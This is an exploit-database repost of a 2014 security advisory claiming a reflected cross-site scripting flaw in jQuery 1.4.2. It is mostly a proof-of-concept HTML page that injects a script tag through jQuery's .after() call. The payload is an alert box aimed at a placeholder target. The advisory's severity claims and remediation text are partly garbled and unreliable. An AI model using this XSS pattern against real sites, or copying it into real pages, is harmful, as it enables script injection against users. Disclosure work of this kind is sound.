[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JQuery 1.4.2 Cross Site Scripting Vulnerability

Author
Mauro Risonho
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22584
Category
web applications
Date add
03-09-2014
Platform
jsp
XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300

VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2

LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.

Published: 09/01/2014
Version: 1.0

Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (
http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2

Product description:
Jquery is a open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Create object option in runtime client-side and insert XSS
Reflected
‘index.html’ page, by phishing or fake site remote.

CVE: CVE-2014-? (feedback cve mitre)

Proof of Concept:
Exploit:jquery-xss-reflected.com.br.html

<!DOCTYPE html>
<! -- Mauro Risonho de Paula Assumpcao -->
<! -- aka firebits mauro.risonho@gmail.com -->
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil                            -->
<! --   _____.__              ___.   .__  __
-->
<! -- _/ ____\__|______   ____\_ |__ |__|/  |_  ______                -->
<! -- \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/                -->
<! -- |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \                 -->
<! -- |__|  |__||__|    \___  |___  /__||__| /____  |                -->
<! --                        \/    \/             \/                 -->
<! -- bits on fire - 1989-2014 - brazil                             -->
<! --                                                                 -->
<! -- * jQuery JavaScript Library v1.4.2                            -->
<! -- * http://jquery.com/                                            -->
<! -- *                                                                -->
<! -- * Copyright 2010, John Resig                                    -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses.        -->
<! -- * http://jquery.org/license                                    -->
<! -- *                                                                -->
<! -- * Includes Sizzle.js                                            -->
<! -- * http://sizzlejs.com/                                        -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses.                -->
<! -- *                                                                -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500                        -->
<! -- */                                                            -->

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - Jquery 1.4.2 </title>
  <script src="http://<target>/js/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>


<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
      </select>
    </p>
  </form>
</body>
</html>


Vendor Response:
<It was not sent to the vendor, but this is sending to the MITRE CVE to
contact the vendor.> from VSLA Virtual Security Labs Anywhere.

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
Update jquery 1.11.1

#  0day.today [2024-06-16]  #